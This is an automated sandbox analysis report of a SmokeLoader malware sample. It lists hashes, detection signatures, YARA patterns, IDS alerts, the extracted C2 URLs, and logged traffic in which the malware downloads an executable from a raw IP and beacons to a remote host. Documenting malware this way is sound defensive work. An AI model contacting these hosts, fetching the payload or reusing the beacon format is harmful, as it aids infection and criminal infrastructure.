Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LgigaSKsL6.exe

Overview

General Information

Sample name:LgigaSKsL6.exe
renamed because original name is a hash value
Original sample name:c61f76c54ce0f89894ef870a48c5497c.exe
Analysis ID:1532278
MD5:c61f76c54ce0f89894ef870a48c5497c
SHA1:2a7dd87f781df6fdaa1b17695d93ee9accf36d1c
SHA256:dc6c2f9d57aee159b5c6453b56c93fa6976f83a3685b388aff968e5dfe498841
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • LgigaSKsL6.exe (PID: 6576 cmdline: "C:\Users\user\Desktop\LgigaSKsL6.exe" MD5: C61F76C54CE0F89894EF870A48C5497C)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • A869.exe (PID: 2028 cmdline: C:\Users\user\AppData\Local\Temp\A869.exe MD5: E3C51CB2EE848A9BED855AB3E756CD82)
  • vsvrjra (PID: 6248 cmdline: C:\Users\user\AppData\Roaming\vsvrjra MD5: C61F76C54CE0F89894EF870A48C5497C)
  • ajvrjra (PID: 2080 cmdline: C:\Users\user\AppData\Roaming\ajvrjra MD5: E3C51CB2EE848A9BED855AB3E756CD82)
  • vsvrjra (PID: 5340 cmdline: C:\Users\user\AppData\Roaming\vsvrjra MD5: C61F76C54CE0F89894EF870A48C5497C)
  • ajvrjra (PID: 3588 cmdline: C:\Users\user\AppData\Roaming\ajvrjra MD5: E3C51CB2EE848A9BED855AB3E756CD82)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
SourceRuleDescriptionAuthorStrings
00000007.00000002.2440499657.0000000002C17000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x3655:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2075651122.0000000002CC0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.1816543399.0000000002FF1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      Click to see the 19 entries

      System Summary

      barindex
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\vsvrjra, CommandLine: C:\Users\user\AppData\Roaming\vsvrjra, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\vsvrjra, NewProcessName: C:\Users\user\AppData\Roaming\vsvrjra, OriginalFileName: C:\Users\user\AppData\Roaming\vsvrjra, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\vsvrjra, ProcessId: 6248, ProcessName: vsvrjra
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-12T23:27:36.506031+020020391031A Network Trojan was detected192.168.2.449736190.224.203.3780TCP
      2024-10-12T23:27:37.897672+020020391031A Network Trojan was detected192.168.2.449737190.224.203.3780TCP
      2024-10-12T23:27:39.375920+020020391031A Network Trojan was detected192.168.2.449738190.224.203.3780TCP
      2024-10-12T23:27:40.762602+020020391031A Network Trojan was detected192.168.2.449739190.224.203.3780TCP
      2024-10-12T23:27:42.132225+020020391031A Network Trojan was detected192.168.2.449740190.224.203.3780TCP
      2024-10-12T23:27:43.504764+020020391031A Network Trojan was detected192.168.2.449741190.224.203.3780TCP
      2024-10-12T23:27:44.877319+020020391031A Network Trojan was detected192.168.2.449742190.224.203.3780TCP
      2024-10-12T23:27:46.243719+020020391031A Network Trojan was detected192.168.2.449743190.224.203.3780TCP
      2024-10-12T23:27:47.659001+020020391031A Network Trojan was detected192.168.2.449744190.224.203.3780TCP
      2024-10-12T23:27:49.040046+020020391031A Network Trojan was detected192.168.2.449745190.224.203.3780TCP
      2024-10-12T23:27:50.403081+020020391031A Network Trojan was detected192.168.2.449746190.224.203.3780TCP
      2024-10-12T23:27:51.781560+020020391031A Network Trojan was detected192.168.2.449747190.224.203.3780TCP
      2024-10-12T23:27:53.491806+020020391031A Network Trojan was detected192.168.2.449748190.224.203.3780TCP
      2024-10-12T23:27:54.872226+020020391031A Network Trojan was detected192.168.2.449749190.224.203.3780TCP
      2024-10-12T23:27:56.260005+020020391031A Network Trojan was detected192.168.2.449750190.224.203.3780TCP
      2024-10-12T23:27:57.931307+020020391031A Network Trojan was detected192.168.2.449751190.224.203.3780TCP
      2024-10-12T23:27:59.334639+020020391031A Network Trojan was detected192.168.2.449752190.224.203.3780TCP
      2024-10-12T23:28:00.783631+020020391031A Network Trojan was detected192.168.2.449753190.224.203.3780TCP
      2024-10-12T23:28:02.177397+020020391031A Network Trojan was detected192.168.2.449760190.224.203.3780TCP
      2024-10-12T23:28:03.568585+020020391031A Network Trojan was detected192.168.2.449772190.224.203.3780TCP
      2024-10-12T23:28:04.965664+020020391031A Network Trojan was detected192.168.2.449778190.224.203.3780TCP
      2024-10-12T23:28:06.355448+020020391031A Network Trojan was detected192.168.2.449789190.224.203.3780TCP
      2024-10-12T23:28:07.767337+020020391031A Network Trojan was detected192.168.2.449800190.224.203.3780TCP
      2024-10-12T23:28:09.198762+020020391031A Network Trojan was detected192.168.2.449811190.224.203.3780TCP
      2024-10-12T23:28:12.186615+020020391031A Network Trojan was detected192.168.2.449828190.224.203.3780TCP
      2024-10-12T23:28:13.598657+020020391031A Network Trojan was detected192.168.2.449839190.224.203.3780TCP
      2024-10-12T23:28:14.981042+020020391031A Network Trojan was detected192.168.2.449848190.224.203.3780TCP
      2024-10-12T23:28:16.368431+020020391031A Network Trojan was detected192.168.2.449856190.224.203.3780TCP
      2024-10-12T23:28:17.790439+020020391031A Network Trojan was detected192.168.2.449862190.224.203.3780TCP
      2024-10-12T23:28:19.160968+020020391031A Network Trojan was detected192.168.2.449873190.224.203.3780TCP
      2024-10-12T23:28:20.515030+020020391031A Network Trojan was detected192.168.2.449882190.224.203.3780TCP
      2024-10-12T23:28:21.888189+020020391031A Network Trojan was detected192.168.2.449890190.224.203.3780TCP
      2024-10-12T23:28:23.273942+020020391031A Network Trojan was detected192.168.2.449901190.224.203.3780TCP
      2024-10-12T23:28:24.646829+020020391031A Network Trojan was detected192.168.2.449908190.224.203.3780TCP
      2024-10-12T23:28:26.025285+020020391031A Network Trojan was detected192.168.2.449918190.224.203.3780TCP
      2024-10-12T23:28:27.541883+020020391031A Network Trojan was detected192.168.2.449929190.224.203.3780TCP
      2024-10-12T23:29:37.673928+020020391031A Network Trojan was detected192.168.2.450039190.224.203.3780TCP
      2024-10-12T23:29:45.033278+020020391031A Network Trojan was detected192.168.2.450040190.224.203.3780TCP
      2024-10-12T23:29:53.061102+020020391031A Network Trojan was detected192.168.2.450041190.224.203.3780TCP
      2024-10-12T23:30:03.157572+020020391031A Network Trojan was detected192.168.2.450042190.224.203.3780TCP
      2024-10-12T23:30:20.229015+020020391031A Network Trojan was detected192.168.2.457093190.220.21.2880TCP
      2024-10-12T23:30:33.637008+020020391031A Network Trojan was detected192.168.2.457094190.220.21.2880TCP
      2024-10-12T23:30:46.932059+020020391031A Network Trojan was detected192.168.2.457095190.220.21.2880TCP
      2024-10-12T23:31:01.016369+020020391031A Network Trojan was detected192.168.2.457096190.220.21.2880TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000009.00000002.2771177068.0000000002C90000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
      Source: nwgrus.ruVirustotal: Detection: 12%Perma Link
      Source: C:\Users\user\AppData\Roaming\vsvrjraReversingLabs: Detection: 42%
      Source: LgigaSKsL6.exeReversingLabs: Detection: 42%
      Source: LgigaSKsL6.exeVirustotal: Detection: 40%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Users\user\AppData\Roaming\vsvrjraJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\A869.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\ajvrjraJoe Sandbox ML: detected
      Source: LgigaSKsL6.exeJoe Sandbox ML: detected
      Source: LgigaSKsL6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\LgigaSKsL6.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49817 version: TLS 1.2

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49772 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49811 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49862 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49882 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49908 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49856 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49929 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49873 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49918 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49800 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49778 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49901 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49839 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49828 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49890 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50042 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57095 -> 190.220.21.28:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57094 -> 190.220.21.28:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50040 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50041 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57093 -> 190.220.21.28:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50039 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49789 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49848 -> 190.224.203.37:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57096 -> 190.220.21.28:80
      Source: C:\Windows\explorer.exeNetwork Connect: 190.224.203.37 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 190.220.21.28 80Jump to behavior
      Source: Malware configuration extractorURLs: https://ninjahallnews.com/search.php
      Source: Malware configuration extractorURLs: https://fallhandbat.com/search.php
      Source: Joe Sandbox ViewIP Address: 190.224.203.37 190.224.203.37
      Source: Joe Sandbox ViewIP Address: 23.145.40.164 23.145.40.164
      Source: Joe Sandbox ViewIP Address: 190.220.21.28 190.220.21.28
      Source: Joe Sandbox ViewASN Name: TelecomArgentinaSAAR TelecomArgentinaSAAR
      Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
      Source: Joe Sandbox ViewASN Name: AMXArgentinaSAAR AMXArgentinaSAAR
      Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
      Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ddmlqgiwokgjnrjp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 251Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://akwopxbyfda.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hdugujrhcjt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yqqseuuafdwk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pkgsugfsxnjdsjfs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwtmirjlqyc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qgmuajpjvyrttvq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pxoxujlnkixexhr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kklpocdpdsv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mubqagferfk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://imnnydowlgvnht.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jodccroecnfoy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nsmlwxtdmapgbt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mgjceopkpxepxsq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://oftgcfgbliielxad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drvjksfgomsvmny.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecoqiraysyfcwnbl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://evxjlpqlxbs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://icaimrqjtfta.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ulydvxuenfbpuxu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gvahueqnuehjgw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tfjoxhiuawit.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fveqebbshittyfl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymhiquwyrvgqovol.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydoywfwjttlrcvfk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yjtrvkrlityi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mjjimnkvahrtrhwm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gppslndiqwv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gbbsahanxxry.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qvmvwcqodtkhh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wvcoypmusqw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: nwgrus.ru
